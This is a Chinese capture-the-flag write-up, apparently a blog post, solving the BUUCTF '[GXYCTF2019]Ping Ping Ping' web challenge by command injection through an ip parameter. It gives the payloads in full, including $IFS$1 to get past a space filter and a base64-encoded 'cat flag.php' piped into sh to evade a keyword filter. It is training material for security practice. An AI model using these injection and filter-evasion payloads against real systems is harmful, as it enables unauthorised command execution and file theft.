ctf题集【BUUCTF WEB】[GXYCTF2019]Ping Ping Ping 1

打开网站,发现提示/?ip=

那么尝试输入/?ip=127.0.0.1后成功执行

尝试能否用管道符执行,输入参数/?ip=127.0.0.1;ls

发现flag.php在当前目录下,那么就需要查看这个文件,尝试输入/?ip=127.0.0.1;cat flag.php

说明空格被限制了,多次尝试发现$IFS$1可以绕过,尝试输入/?ip=127.0.0.1;cat$IFS$1flag.php

flag也被限制了,那么尝试/?ip=127.0.0.1;cat$IFS$1fla*

看来*也被限制了,那么尝试'''、''、\、$1、都无法绕过,换个思路,用base64绕过

echo "Y2F0IGZsYWcucGhwCg==" | base64 -d | sh
echo$IFS$1Y2F0IGZsYWcucGhwCg==$IFS$1|$IFS$1base64$IFS$1-d|sh

成功绕过

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值